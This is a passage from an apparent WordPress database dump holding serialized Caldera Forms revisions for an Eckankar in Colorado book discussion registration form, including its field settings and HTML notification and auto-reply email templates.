Us</a></p>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">&nbsp;</td>\n</tr>\n</tbody>\n</table>\n</div>\n</div>\n</div>\n</div>\";}s:10:\"conditions\";a:2:{s:4:\"type\";s:0:\"\";s:5:\"group\";a:0:{}}}}s:8:\"settings\";a:1:{s:10:\"responsive\";a:1:{s:11:\"break_point\";s:2:\"sm\";}}s:18:\"conditional_groups\";a:1:{s:10:\"conditions\";a:0:{}}s:24:\"privacy_exporter_enabled\";b:0;s:7:\"version\";s:5:\"1.9.4\";}'),(40,'CF60874262a3d99','revision','a:22:{s:2:\"ID\";s:15:\"CF60874262a3d99\";s:13:\"_last_updated\";s:31:\"Wed, 28 Apr 2021 02:07:04 +0000\";s:10:\"cf_version\";s:5:\"1.9.4\";s:4:\"name\";s:28:\"Book Discussion Registration\";s:10:\"scroll_top\";i:1;s:7:\"success\";s:146:\"<center>Thank you for your interest in joining an ECK Book Discussion!<br>\nYou will be contacted soon regarding the class.</center>															\";s:10:\"db_support\";i:1;s:6:\"pinned\";i:0;s:9:\"hide_form\";i:1;s:11:\"check_honey\";i:1;s:12:\"avatar_field\";s:11:\"fld_6009157\";s:9:\"form_ajax\";i:1;s:15:\"custom_callback\";s:0:\"\";s:11:\"layout_grid\";a:2:{s:6:\"fields\";a:7:{s:9:\"fld_29462\";s:3:\"1:1\";s:11:\"fld_8768091\";s:3:\"2:1\";s:11:\"fld_9970286\";s:3:\"2:2\";s:11:\"fld_6009157\";s:3:\"3:1\";s:11:\"fld_3657255\";s:3:\"3:2\";s:11:\"fld_7683514\";s:3:\"4:1\";s:11:\"fld_7908577\";s:3:\"5:1\";}s:9:\"structure\";s:16:\"12|6:6|6:6|12|12\";}s:6:\"fields\";a:7:{s:9:\"fld_29462\";a:7:{s:2:\"ID\";s:9:\"fld_29462\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:6:\"header\";s:4:\"slug\";s:6:\"header\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:2:{s:12:\"custom_class\";s:0:\"\";s:7:\"default\";s:109:\"<h2>ECK Book Discussion Registration</h2>\nYour information will only be used to respond to your request.\n<hr>\";}}s:11:\"fld_8768091\";a:8:{s:2:\"ID\";s:11:\"fld_8768091\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:10:\"First Name\";s:4:\"slug\";s:10:\"first_name\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:7:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_9970286\";a:8:{s:2:\"ID\";s:11:\"fld_9970286\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:9:\"Last Name\";s:4:\"slug\";s:9:\"last_name\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:7:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_6009157\";a:8:{s:2:\"ID\";s:11:\"fld_6009157\";s:4:\"type\";s:5:\"email\";s:5:\"label\";s:13:\"Email Address\";s:4:\"slug\";s:13:\"email_address\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_3657255\";a:8:{s:2:\"ID\";s:11:\"fld_3657255\";s:4:\"type\";s:5:\"phone\";s:5:\"label\";s:5:\"Phone\";s:4:\"slug\";s:5:\"phone\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:7:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:4:\"type\";s:5:\"local\";s:6:\"custom\";s:13:\"(999)999-9999\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_7683514\";a:8:{s:2:\"ID\";s:11:\"fld_7683514\";s:4:\"type\";s:9:\"paragraph\";s:5:\"label\";s:20:\"Comments / Questions\";s:4:\"slug\";s:18:\"comments_questions\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:6:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:4:\"rows\";i:7;s:7:\"default\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_7908577\";a:7:{s:2:\"ID\";s:11:\"fld_7908577\";s:4:\"type\";s:6:\"button\";s:5:\"label\";s:12:\"Send Message\";s:4:\"slug\";s:6:\"submit\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:4:{s:12:\"custom_class\";s:0:\"\";s:4:\"type\";s:6:\"submit\";s:5:\"class\";s:15:\"btn btn-default\";s:6:\"target\";s:0:\"\";}}}s:10:\"page_names\";a:1:{i:0;s:6:\"Page 1\";}s:6:\"mailer\";a:9:{s:9:\"on_insert\";i:1;s:11:\"sender_name\";s:26:\"Caldera Forms Notification\";s:12:\"sender_email\";s:31:\"webmaster@eckankar-colorado.org\";s:8:\"reply_to\";s:15:\"%email_address%\";s:10:\"email_type\";s:4:\"html\";s:10:\"recipients\";s:15:\"%email_address%\";s:6:\"bcc_to\";s:0:\"\";s:13:\"email_subject\";s:20:\"Book Discussion Form\";s:13:\"email_message\";s:8015:\"<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n<p>\n<style type=\"text/css\">\n        @media screen {<br />\n            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: normal;<br />\n                font-weight: 400;<br />\n                src: local(\'Lato Regular\'), local(\'Lato-Regular\'), url(https://fonts.gstatic.com/s/lato/v11/qIIYRU-oROkIk8vfvxw6QvesZW2xOQ-xsNqO47m55DA.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: normal;<br />\n                font-weight: 700;<br />\n                src: local(\'Lato Bold\'), local(\'Lato-Bold\'), url(https://fonts.gstatic.com/s/lato/v11/qdgUG4U09HnJwhYI-uK18wLUuEpTyoUstqEm5AMlJo4.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: italic;<br />\n                font-weight: 400;<br />\n                src: local(\'Lato Italic\'), local(\'Lato-Italic\'), url(https://fonts.gstatic.com/s/lato/v11/RYyZNoeFgb0l7W3Vu1aSWOvvDin1pK8aKteLpeZ5c0A.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: italic;<br />\n                font-weight: 700;<br />\n                src: local(\'Lato Bold Italic\'), local(\'Lato-BoldItalic\'), url(https://fonts.gstatic.com/s/lato/v11/HkF_qI1x_noxlxhrhMQYELO3LdcAZYWl9Si6vvxL-qU.woff) format(\'woff\');<br />\n            }<br />\n        }</p>\n<p>        /* CLIENT-SPECIFIC STYLES */<br />\n        body,<br />\n        table,<br />\n        td,<br />\n        a {<br />\n            -webkit-text-size-adjust: 100%;<br />\n            -ms-text-size-adjust: 100%;<br />\n        }</p>\n<p>        table,<br />\n        td {<br />\n            mso-table-lspace: 0pt;<br />\n            mso-table-rspace: 0pt;<br />\n        }</p>\n<p>        img {<br />\n            -ms-interpolation-mode: bicubic;<br />\n        }</p>\n<p>        /* RESET STYLES */<br />\n        img {<br />\n            border: 0;<br />\n            height: auto;<br />\n            line-height: 100%;<br />\n            outline: none;<br />\n            text-decoration: none;<br />\n        }</p>\n<p>        table {<br />\n            border-collapse: collapse !important;<br />\n        }</p>\n<p>        body {<br />\n            height: 100% !important;<br />\n            margin: 0 !important;<br />\n            padding: 0 !important;<br />\n            width: 100% !important;<br />\n        }</p>\n<p>        /* iOS BLUE LINKS */<br />\n        a[x-apple-data-detectors] {<br />\n            color: inherit !important;<br />\n            text-decoration: none !important;<br />\n            font-size: inherit !important;<br />\n            font-family: inherit !important;<br />\n            font-weight: inherit !important;<br />\n            line-height: inherit !important;<br />\n        }</p>\n<p>        /* MOBILE STYLES */<br />\n        @media screen and (max-width:600px) {<br />\n            h1 {<br />\n                font-size: 32px !important;<br />\n                line-height: 32px !important;<br />\n            }<br />\n        }</p>\n<p>        /* ANDROID CENTER FIX */<br />\n        div[style*=\"margin: 16px 0;\"] {<br />\n            margin: 0 !important;<br />\n        }<br />\n    </style>\n</p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n<table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><!-- LOGO -->\n<tbody>\n<tr>\n<td bgcolor=\"#5D97D0\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 0px 10px 40px 10px;\" valign=\"top\" align=\"center\">&nbsp;</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#5D97D0\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 40px 20px 20px 20px; border-radius: 4px 4px 0px 0px; color: #111111; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 48px; font-weight: 400; letter-spacing: 4px; line-height: 48px; border-bottom: solid 4px #23507d;\" valign=\"top\" bgcolor=\"#ffffff\" align=\"center;\">\n<h1 class=\"\" style=\"font-family: \'Bitter\', Georgia, Times, \'Times New Roman\', serif; font-size: 47px; font-weight: normal; letter-spacing: normal; color: #1d5791; text-transform: capitalize; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Eckankar In Colorado</h1>\n<p class=\"\" style=\"font-size: 20px; font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 600; text-align: center; letter-spacing: 3px; color: #6b6b6b; border: 2px solid #ebebeb; background-color: #ffffff;\" data-font-family=\"Trebuchet MS\" data-font-weight=\"600\" data-font-style=\"\"><strong>New Admin Web Submission</strong></p>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">\n<table style=\"max-width: 600px; font-weight: 400; font-size: 13px;\" data-font-weight=\"400\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 20px 30px 25px 30px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#ebebeb\" align=\"left\">\n<p class=\"\" style=\"margin: 0px; font-family: Open Sans; font-weight: 600; font-size: 23px; text-align: center; color: #954c08;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Book Discussion Registration Request</p>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 20px 30px 15px 30px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#ffffff\" align=\"left\">\n<p class=\"color3-color\" style=\"font-size: 20px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">You have a new<strong><em> Book Discussion</em> </strong>form submission.</p>\n<p class=\"\" style=\"font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">A user on the <i><strong>Eckankar In Colorado</strong></i> website has submitted this form. The following person has requested contact with an ECK representative.</p>\n</td>\n</tr>\n<tr>\n<td bgcolor=\"#ffffff\" align=\"left\">\n<table style=\"width: 100%; height: 25px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr style=\"height: 62px;\">\n<td style=\"padding: 22px 30px; height: 25px; border-top: solid 2px #ccc; border-bottom: solid 2px #ccc;\" bgcolor=\"#EBEBEB\" align=\"left; padding-top: 25px; padding-bottom: 15px;\">\n<table style=\"color: #4c4747; font-family: Open Sans; font-weight: 400; font-size: 16px; line-height: 12px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"border-radius: 3px; text-align: left;\" bgcolor=\"#EBEBEB\" align=\"left\">{summary}</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">\n<table style=\"max-width: 600px; font-size: 13px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 30px 30px 30px 30px; border-radius: 4px 4px 4px 4px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#FFECD1\" align=\"center\">If you have any questions regarding the origin of this form, please feel free to contact the <a class=\"\" href=\"https://www.eckankar-colorado.org\">Eckankar In Colorado </a>webmaster: webmaster@eckankar-colorado.org</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">&nbsp;</td>\n</tr>\n</tbody>\n</table>\n</div>\n</div>\n</div>\n</div>\";}s:10:\"processors\";a:1:{s:11:\"fp_17689566\";a:5:{s:2:\"ID\";s:11:\"fp_17689566\";s:8:\"runtimes\";a:1:{s:6:\"insert\";i:1;}s:4:\"type\";s:14:\"auto_responder\";s:6:\"config\";a:9:{s:11:\"sender_name\";s:20:\"Eckankar In Colorado\";s:12:\"sender_email\";s:31:\"webmaster@eckankar-colorado.org\";s:8:\"reply_to\";s:15:\"%email_address%\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:7:\"subject\";s:27:\"Thank you for contacting us\";s:14:\"recipient_name\";s:24:\"%first_name% %last_name%\";s:15:\"recipient_email\";s:15:\"%email_address%\";s:7:\"message\";s:8908:\"<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n<p>\n<style type=\"text/css\">\n        @media screen {<br />\n            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: normal;<br />\n                font-weight: 400;<br />\n                src: local(\'Lato Regular\'), local(\'Lato-Regular\'), url(https://fonts.gstatic.com/s/lato/v11/qIIYRU-oROkIk8vfvxw6QvesZW2xOQ-xsNqO47m55DA.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: normal;<br />\n                font-weight: 700;<br />\n                src: local(\'Lato Bold\'), local(\'Lato-Bold\'), url(https://fonts.gstatic.com/s/lato/v11/qdgUG4U09HnJwhYI-uK18wLUuEpTyoUstqEm5AMlJo4.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: italic;<br />\n                font-weight: 400;<br />\n                src: local(\'Lato Italic\'), local(\'Lato-Italic\'), url(https://fonts.gstatic.com/s/lato/v11/RYyZNoeFgb0l7W3Vu1aSWOvvDin1pK8aKteLpeZ5c0A.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: italic;<br />\n                font-weight: 700;<br />\n                src: local(\'Lato Bold Italic\'), local(\'Lato-BoldItalic\'), url(https://fonts.gstatic.com/s/lato/v11/HkF_qI1x_noxlxhrhMQYELO3LdcAZYWl9Si6vvxL-qU.woff) format(\'woff\');<br />\n            }<br />\n        }</p>\n<p>        /* CLIENT-SPECIFIC STYLES */<br />\n        body,<br />\n        table,<br />\n        td,<br />\n        a {<br />\n            -webkit-text-size-adjust: 100%;<br />\n            -ms-text-size-adjust: 100%;<br />\n        }</p>\n<p>        table,<br />\n        td {<br />\n            mso-table-lspace: 0pt;<br />\n            mso-table-rspace: 0pt;<br />\n        }</p>\n<p>        img {<br />\n            -ms-interpolation-mode: bicubic;<br />\n        }</p>\n<p>        /* RESET STYLES */<br />\n        img {<br />\n            border: 0;<br />\n            height: auto;<br />\n            line-height: 100%;<br />\n            outline: none;<br />\n            text-decoration: none;<br />\n        }</p>\n<p>        table {<br />\n            border-collapse: collapse !important;<br />\n        }</p>\n<p>        body {<br />\n            height: 100% !important;<br />\n            margin: 0 !important;<br />\n            padding: 0 !important;<br />\n            width: 100% !important;<br />\n        }</p>\n<p>        /* iOS BLUE LINKS */<br />\n        a[x-apple-data-detectors] {<br />\n            color: inherit !important;<br />\n            text-decoration: none !important;<br />\n            font-size: inherit !important;<br />\n            font-family: inherit !important;<br />\n            font-weight: inherit !important;<br />\n            line-height: inherit !important;<br />\n        }</p>\n<p>        /* MOBILE STYLES */<br />\n        @media screen and (max-width:600px) {<br />\n            h1 {<br />\n                font-size: 32px !important;<br />\n                line-height: 32px !important;<br />\n            }<br />\n        }</p>\n<p>        /* ANDROID CENTER FIX */<br />\n        div[style*=\"margin: 16px 0;\"] {<br />\n            margin: 0 !important;<br />\n        }<br />\n    </style>\n</p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n<table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><!-- LOGO -->\n<tbody>\n<tr>\n<td bgcolor=\"#5D97D0\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 40px 10px 40px 10px;\" valign=\"top\" align=\"center\">&nbsp;</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#5D97D0\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 40px 20px 20px 20px; border-radius: 4px 4px 0px 0px; color: #111111; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 48px; font-weight: 400; letter-spacing: 4px; line-height: 48px; border-bottom: solid 4px #23507d;\" valign=\"top\" bgcolor=\"#ffffff\" align=\"center;\">\n<h1 class=\"\" style=\"font-family: \'Bitter\', Georgia, Times, \'Times New Roman\', serif; font-size: 47px; font-weight: normal; letter-spacing: normal; color: #1d5791; text-transform: capitalize; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Eckankar In Colorado</h1>\n<p class=\"\" style=\"font-size: 20px; font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 600; text-align: center; letter-spacing: 3px; color: #6b6b6b; border: 2px solid #ebebeb; background-color: #e8f2fc;\" data-font-family=\"Trebuchet MS\" data-font-weight=\"600\" data-font-style=\"\">About Your Web Submission Request</p>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">\n<table style=\"max-width: 600px; font-weight: 400;\" data-font-weight=\"400\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 20px 30px 25px 30px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#ebebeb\" align=\"left\">\n<p class=\"\" style=\"margin: 0px; font-family: Open Sans; font-weight: 600; font-size: 23px; text-align: center; color: #954c08;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Book Discussion Registration Confirmation</p>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 20px 30px 15px 30px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#ffffff\" align=\"left\">\n<p class=\"\" style=\"margin: 0px; font-family: Open Sans; font-weight: 600; font-size: 18px; color: #4c4747; line-height: 31px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Hello %first_name%!</p>\n<p class=\"\" style=\"margin: 0px; font-family: Open Sans; font-weight: 400; font-size: 16px; color: #4c4747;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Thank you for signing up for one of our ECK Book Discussion Classes. We look forward to meeting you! Below is the information that you have submitted to us, which will only be used to respond to your request.</p>\n</td>\n</tr>\n<tr>\n<td bgcolor=\"#ffffff\" align=\"left\">\n<table style=\"width: 100%; height: 25px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr style=\"height: 62px;\">\n<td style=\"padding: 22px 30px; height: 25px; border-top: solid 2px #ccc; border-bottom: solid 2px #ccc;\" bgcolor=\"#EBEBEB\" align=\"left; padding-top: 25px; padding-bottom: 15px;\">\n<table style=\"color: #4c4747; font-family: Open Sans; font-weight: 400; font-size: 16px; line-height: 12px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"border-radius: 3px; text-align: left;\" bgcolor=\"#EBEBEB\" align=\"left\">{summary}</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 30px 30px 30px 30px; border-radius: 4px 4px 4px 4px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#FFECD1\" align=\"center\">\n<p class=\"\" style=\"font-size: 17px; font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 400; color: #6b6b6b;\" data-font-family=\"Trebuchet MS\" data-font-weight=\"400\" data-font-style=\"\">You are receiving this email because you have submitted a request through the Eckankar in Colorado website.</p>\n<p class=\"\" style=\"font-size: 17px; font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 400; color: #6b6b6b;\" data-font-family=\"Trebuchet MS\" data-font-weight=\"400\" data-font-style=\"\">If you have any questions regarding the origin of this form, please feel free to get in touch — we\'re always happy to help out.</p>\n<p class=\"\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a class=\"\" style=\"font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 400; font-size: 17px;\" href=\"mailto:webmaster@eckankar-colorado.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Trebuchet MS\" data-font-weight=\"400\" data-font-style=\"\">Contact Us</a></p>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">&nbsp;</td>\n</tr>\n</tbody>\n</table>\n</div>\n</div>\n</div>\n</div>\";}s:10:\"conditions\";a:2:{s:4:\"type\";s:0:\"\";s:5:\"group\";a:0:{}}}}s:8:\"settings\";a:1:{s:10:\"responsive\";a:1:{s:11:\"break_point\";s:2:\"sm\";}}s:18:\"conditional_groups\";a:1:{s:10:\"conditions\";a:0:{}}s:24:\"privacy_exporter_enabled\";b:0;s:7:\"version\";s:5:\"1.9.4\";}'),(41,'CF60874262a3d99','revision','a:22:{s:2:\"ID\";s:15:\"CF60874262a3d99\";s:13:\"_last_updated\";s:31:\"Wed, 28 Apr 2021 02:07:51 +0000\";s:10:\"cf_version\";s:5:\"1.9.4\";s:4:\"name\";s:28:\"Book Discussion Registration\";s:10:\"scroll_top\";i:1;s:7:\"success\";s:149:\"<center>Thank you for your interest in joining an ECK Book Discussion!<br>\nYou will be contacted soon regarding the class.</center>																		\";s:10:\"db_support\";i:1;s:6:\"pinned\";i:0;s:9:\"hide_form\";i:1;s:11:\"check_honey\";i:1;s:12:\"avatar_field\";s:11:\"fld_6009157\";s:9:\"form_ajax\";i:1;s:15:\"custom_callback\";s:0:\"\";s:11:\"layout_grid\";a:2:{s:6:\"fields\";a:7:{s:9:\"fld_29462\";s:3:\"1:1\";s:11:\"fld_8768091\";s:3:\"2:1\";s:11:\"fld_9970286\";s:3:\"2:2\";s:11:\"fld_6009157\";s:3:\"3:1\";s:11:\"fld_3657255\";s:3:\"3:2\";s:11:\"fld_7683514\";s:3:\"4:1\";s:11:\"fld_7908577\";s:3:\"5:1\";}s:9:\"structure\";s:16:\"12|6:6|6:6|12|12\";}s:6:\"fields\";a:7:{s:9:\"fld_29462\";a:7:{s:2:\"ID\";s:9:\"fld_29462\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:6:\"header\";s:4:\"slug\";s:6:\"header\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:2:{s:12:\"custom_class\";s:0:\"\";s:7:\"default\";s:109:\"<h2>ECK Book Discussion Registration</h2>\nYour information will only be used to respond to your request.\n<hr>\";}}s:11:\"fld_8768091\";a:8:{s:2:\"ID\";s:11:\"fld_8768091\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:10:\"First Name\";s:4:\"slug\";s:10:\"first_name\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:7:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_9970286\";a:8:{s:2:\"ID\";s:11:\"fld_9970286\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:9:\"Last Name\";s:4:\"slug\";s:9:\"last_name\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:7:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_6009157\";a:8:{s:2:\"ID\";s:11:\"fld_6009157\";s:4:\"type\";s:5:\"email\";s:5:\"label\";s:13:\"Email Address\";s:4:\"slug\";s:13:\"email_address\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_3657255\";a:8:{s:2:\"ID\";s:11:\"fld_3657255\";s:4:\"type\";s:5:\"phone\";s:5:\"label\";s:5:\"Phone\";s:4:\"slug\";s:5:\"phone\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:7:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:4:\"type\";s:5:\"local\";s:6:\"custom\";s:13:\"(999)999-9999\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_7683514\";a:8:{s:2:\"ID\";s:11:\"fld_7683514\";s:4:\"type\";s:9:\"paragraph\";s:5:\"label\";s:20:\"Comments / 